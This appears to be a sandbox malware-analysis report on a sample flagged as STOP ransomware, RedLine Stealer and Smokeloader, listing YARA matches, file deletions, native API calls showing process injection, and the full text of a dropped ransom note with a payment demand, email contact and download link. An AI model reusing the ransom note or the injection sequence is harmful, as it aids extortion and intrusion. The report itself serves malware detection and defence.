Source: Yara match	File source: 25.2.33A3.exe.49e15a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.33A3.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.33A3.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.33A3.exe.4a015a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.33A3.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.33A3.exe.4a315a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.33A3.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.33A3.exe.4a315a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.33A3.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.33A3.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.33A3.exe.49e15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.33A3.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.33A3.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000010.00000002.3250613248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.2629001294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2446025490.0000000004A30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2396691282.0000000004A00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2442763090.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2422576325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.2530314082.0000000004A00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.2617025690.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2433122057.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.2541887297.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 33A3.exe PID: 4400, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 33A3.exe PID: 3556, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 33A3.exe PID: 3780, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 33A3.exe PID: 5964, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 33A3.exe PID: 5328, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 33A3.exe PID: 2104, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 33A3.exe PID: 2284, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 33A3.exe PID: 5560, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 33A3.exe PID: 5680, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 33A3.exe PID: 4276, type: MEMORYSTR

Modifies existing user documents (likely ransomware behavior)

Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	File moved: C:\Users\user\Desktop\NVWZAPQSQL\TQDFJHPUIU.png	Jump to behavior
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	File moved: C:\Users\user\Desktop\EEGWXUHVUG\EEGWXUHVUG.docx	Jump to behavior
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	File deleted: C:\Users\user\Desktop\EEGWXUHVUG\EEGWXUHVUG.docx
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	File moved: C:\Users\user\Desktop\GRXZDKKVDB.png	Jump to behavior
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	File deleted: C:\Users\user\Desktop\GRXZDKKVDB.png

Writes a notice file (html or txt) to demand a ransom

Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	File dropped: C:\Users\user\AppData\Local\VirtualStore\_readme.txt -> decrypt tool and unique key for you.this software will decrypt all your encrypted files.what guarantees you have?you can send one of your encrypted file from your pc and we decrypt it for free.but we can decrypt only 1 file for free. file must not contain valuable information.do not ask assistants from youtube and recovery data sites for help in recovering your data.they can use your free decryption quota and scam you.our contact is emails in this text document only.you can get and look video overview decrypt tool:https://wetransfer.com/downloads/33b490a613f49fa190924f199d2c079e20240512191214/caaf73price of private key and decrypt software is $999.discount 50% available if you contact us first 72 hours, that's price for you is $499.please note that you'll never restore your data without payment.check your e-mail "spam" or "junk" folder if you don't get answer more than 6 hours.to get this software you need write on our e-mail:support@freshingmail.topreserve e-mail address			Jump to dropped file
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	File dropped: C:\Users\user\_readme.txt -> decrypt tool and unique key for you.this software will decrypt all your encrypted files.what guarantees you have?you can send one of your encrypted file from your pc and we decrypt it for free.but we can decrypt only 1 file for free. file must not contain valuable information.do not ask assistants from youtube and recovery data sites for help in recovering your data.they can use your free decryption quota and scam you.our contact is emails in this text document only.you can get and look video overview decrypt tool:https://wetransfer.com/downloads/33b490a613f49fa190924f199d2c079e20240512191214/caaf73price of private key and decrypt software is $999.discount 50% available if you contact us first 72 hours, that's price for you is $499.please note that you'll never restore your data without payment.check your e-mail "spam" or "junk" folder if you don't get answer more than 6 hours.to get this software you need write on our e-mail:support@freshingmail.topreserve e-mail address			Jump to dropped file

System Summary

Malicious sample detected (through community Yara rule)

Source: 9.2.33A3.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 9.2.33A3.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 13.2.33A3.exe.4a415a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 13.2.33A3.exe.4a415a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 26.2.33A3.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 26.2.33A3.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 13.2.33A3.exe.4a415a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 8.2.33A3.exe.4a015a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 13.2.33A3.exe.4a415a0.1.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 8.2.33A3.exe.4a015a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 22.2.33A3.exe.4a015a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 22.2.33A3.exe.4a015a0.1.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 8.2.33A3.exe.4a015a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 8.2.33A3.exe.4a015a0.1.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 25.2.33A3.exe.49e15a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 25.2.33A3.exe.49e15a0.1.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 14.2.33A3.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 14.2.33A3.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 26.2.33A3.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 26.2.33A3.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 22.2.33A3.exe.4a015a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 22.2.33A3.exe.4a015a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 16.2.33A3.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 16.2.33A3.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 15.2.33A3.exe.4a315a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 15.2.33A3.exe.4a315a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 23.2.33A3.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 23.2.33A3.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 15.2.33A3.exe.4a315a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 15.2.33A3.exe.4a315a0.1.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 23.2.33A3.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 23.2.33A3.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 16.2.33A3.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 16.2.33A3.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 25.2.33A3.exe.49e15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 25.2.33A3.exe.49e15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 14.2.33A3.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 14.2.33A3.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 9.2.33A3.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 9.2.33A3.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000004.00000002.2342522385.0000000002E8B000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000010.00000002.3250613248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000010.00000002.3250613248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 0000000D.00000002.2432836380.0000000002EB7000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000016.00000002.2529798141.0000000002EAE000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000004.00000002.2342373288.0000000002E30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000000.00000002.2068190950.0000000002E20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 0000001A.00000002.2629001294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0000001A.00000002.2629001294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000000.00000002.2068864914.0000000002ECB000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000004.00000002.2342341845.0000000002E20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 0000000F.00000002.2446025490.0000000004A30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000008.00000002.2396691282.0000000004A00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000004.00000002.2342416415.0000000002E51000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000000.00000002.2068350928.0000000002E51000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 0000001E.00000002.3280589230.000000000CAC1000.00000020.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 0000000E.00000002.2442763090.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0000000E.00000002.2442763090.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000009.00000002.2422576325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000009.00000002.2422576325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000019.00000002.2616958897.000000000494A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000016.00000002.2530314082.0000000004A00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000008.00000002.2396309012.0000000002FC7000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000019.00000002.2617025690.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000029.00000002.3255503396.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 0000000D.00000002.2433122057.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000000.00000002.2068279346.0000000002E30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000029.00000002.3254939244.0000000002F2E000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000000F.00000002.2445927456.0000000004995000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000017.00000002.2541887297.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000017.00000002.2541887297.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: Process Memory Space: 33A3.exe PID: 4400, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: 33A3.exe PID: 3556, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: 33A3.exe PID: 3780, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: 33A3.exe PID: 5964, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: 33A3.exe PID: 5328, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: 33A3.exe PID: 2104, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: 33A3.exe PID: 2284, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: 33A3.exe PID: 5560, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: 33A3.exe PID: 5680, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: 33A3.exe PID: 4276, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown

Contains functionality to call native functions

Source: C:\Users\user\Desktop\XVM5nluelx.exe	Code function: 0_2_004015D5 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_004015D5
Source: C:\Users\user\Desktop\XVM5nluelx.exe	Code function: 0_2_00401603 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401603
Source: C:\Users\user\Desktop\XVM5nluelx.exe	Code function: 0_2_0040161A NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_0040161A
Source: C:\Users\user\Desktop\XVM5nluelx.exe	Code function: 0_2_004026D2 NtOpenKey,	0_2_004026D2
Source: C:\Users\user\Desktop\XVM5nluelx.exe	Code function: 0_2_00402745 NtEnumerateKey,	0_2_00402745
Source: C:\Users\user\Desktop\XVM5nluelx.exe	Code function: 0_2_00402348 NtQuerySystemInformation,NtQuerySystemInformation,	0_2_00402348
Source: C:\Users\user\Desktop\XVM5nluelx.exe	Code function: 0_2_0040156B NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_0040156B
Source: C:\Users\user\Desktop\XVM5nluelx.exe	Code function: 0_2_00402770 NtEnumerateKey,	0_2_00402770
Source: C:\Users\user\Desktop\XVM5nluelx.exe	Code function: 0_2_0040217B NtQuerySystemInformation,NtQuerySystemInformation,	0_2_0040217B
Source: C:\Users\user\Desktop\XVM5nluelx.exe	Code function: 0_2_0040217D NtQuerySystemInformation,NtQuerySystemInformation,	0_2_0040217D
Source: C:\Users\user\Desktop\XVM5nluelx.exe	Code function: 0_2_004021CB NtQuerySystemInformation,NtQuerySystemInformation,	0_2_004021CB
Source: C:\Users\user\Desktop\XVM5nluelx.exe	Code function: 0_2_004017DF NtMapViewOfSection,NtMapViewOfSection,	0_2_004017DF
Source: C:\Users\user\Desktop\XVM5nluelx.exe	Code function: 0_2_004015E0 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_004015E0
Source: C:\Users\user\Desktop\XVM5nluelx.exe	Code function: 0_2_004015F1 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_004015F1
Source: C:\Users\user\Desktop\XVM5nluelx.exe	Code function: 0_2_004015F5 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_004015F5
Source: C:\Users\user\Desktop\XVM5nluelx.exe	Code function: 0_2_004015F8 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_004015F8
Source: C:\Users\user\Desktop\XVM5nluelx.exe	Code function: 0_2_00402188 NtQuerySystemInformation,NtQuerySystemInformation,	0_2_00402188
Source: C:\Users\user\Desktop\XVM5nluelx.exe	Code function: 0_2_004027A0 NtClose,	0_2_004027A0
Source: C:\Users\user\Desktop\XVM5nluelx.exe	Code function: 0_2_004021A1 NtQuerySystemInformation,NtQuerySystemInformation,	0_2_004021A1
Source: C:\Users\user\Desktop\XVM5nluelx.exe	Code function: 0_2_004021BB NtQuerySystemInformation,NtQuerySystemInformation,	0_2_004021BB
Source: C:\Users\user\AppData\Roaming\dejcbcc	Code function: 4_2_004015D5 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	4_2_004015D5
Source: C:\Users\user\AppData\Roaming\dejcbcc	Code function: 4_2_00401603 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	4_2_00401603
Source: C:\Users\user\AppData\Roaming\dejcbcc	Code function: 4_2_0040161A NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	4_2_0040161A
Source: C:\Users\user\AppData\Roaming\dejcbcc	Code function: 4_2_004026D2 NtOpenKey,	4_2_004026D2
Source: C:\Users\user\AppData\Roaming\dejcbcc	Code function: 4_2_00402745 NtEnumerateKey,	4_2_00402745
Source: C:\Users\user\AppData\Roaming\dejcbcc	Code function: 4_2_00402348 NtQuerySystemInformation,NtQuerySystemInformation,	4_2_00402348
Source: C:\Users\user\AppData\Roaming\dejcbcc	Code function: 4_2_0040156B NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	4_2_0040156B
Source: C:\Users\user\AppData\Roaming\dejcbcc	Code function: 4_2_00402770 NtEnumerateKey,	4_2_00402770
Source: C:\Users\user\AppData\Roaming\dejcbcc	Code function: 4_2_0040217B NtQuerySystemInformation,NtQuerySystemInformation,	4_2_0040217B
Source: C:\Users\user\AppData\Roaming\dejcbcc	Code function: 4_2_0040217D NtQuerySystemInformation,NtQuerySystemInformation,	4_2_0040217D
Source: C:\Users\user\AppData\Roaming\dejcbcc	Code function: 4_2_004021CB NtQuerySystemInformation,NtQuerySystemInformation,	4_2_004021CB
Source: C:\Users\user\AppData\Roaming\dejcbcc	Code function: 4_2_004017DF NtMapViewOfSection,NtMapViewOfSection,	4_2_004017DF
Source: C:\Users\user\AppData\Roaming\dejcbcc	Code function: 4_2_004015E0 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	4_2_004015E0
Source: C:\Users\user\AppData\Roaming\dejcbcc	Code function: 4_2_004015F1 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	4_2_004015F1
Source: C:\Users\user\AppData\Roaming\dejcbcc	Code function: 4_2_004015F5 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	4_2_004015F5
Source: C:\Users\user\AppData\Roaming\dejcbcc	Code function: 4_2_004015F8 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	4_2_004015F8
Source: C:\Users\user\AppData\Roaming\dejcbcc	Code function: 4_2_00402188 NtQuerySystemInformation,NtQuerySystemInformation,	4_2_00402188
Source: C:\Users\user\AppData\Roaming\dejcbcc	Code function: 4_2_004027A0 NtClose,	4_2_004027A0
Source: C:\Users\user\AppData\Roaming\dejcbcc	Code function: 4_2_004021A1 NtQuerySystemInformation,NtQuerySystemInformation,	4_2_004021A1
Source: C:\Users\user\AppData\Roaming\dejcbcc	Code function: 4_2_004021BB NtQuerySystemInformation,NtQuerySystemInformation,	4_2_004021BB
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 8_2_04A00110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess,	8_2_04A00110
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 13_2_04A40110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess,	13_2_04A40110

Detected potential crypto function

Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 8_2_04A03520	8_2_04A03520
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 8_2_04A07520	8_2_04A07520
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 8_2_04A0A699	8_2_04A0A699
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 8_2_04A4B69F	8_2_04A4B69F
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 8_2_04A0E6E0	8_2_04A0E6E0
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 8_2_04A0A79A	8_2_04A0A79A
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 8_2_04A2D7F1	8_2_04A2D7F1
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 8_2_04A0C760	8_2_04A0C760
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 8_2_04A0B0B0	8_2_04A0B0B0
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 8_2_04A070E0	8_2_04A070E0
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 8_2_04A030F0	8_2_04A030F0
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 8_2_04A100D0	8_2_04A100D0
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 8_2_04A0A026	8_2_04A0A026
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 8_2_04A1F030	8_2_04A1F030
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 8_2_04A0B000	8_2_04A0B000
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 8_2_04A2D1A4	8_2_04A2D1A4
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 8_2_04A09120	8_2_04A09120
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 8_2_04A4E141	8_2_04A4E141
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 8_2_04A822C0	8_2_04A822C0
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 8_2_04A07220	8_2_04A07220
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 8_2_04A07393	8_2_04A07393
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 8_2_04A4E37C	8_2_04A4E37C
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 8_2_04A05DE7	8_2_04A05DE7
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 8_2_04A05DF7	8_2_04A05DF7
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 8_2_04A42D1E	8_2_04A42D1E
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 8_2_04A34E9F	8_2_04A34E9F
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 8_2_04A08E60	8_2_04A08E60
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 8_2_04A07880	8_2_04A07880
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 8_2_04A218D0	8_2_04A218D0
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 8_2_04A2E9A3	8_2_04A2E9A3
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 8_2_04A2F9B0	8_2_04A2F9B0
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 8_2_04A059F7	8_2_04A059F7
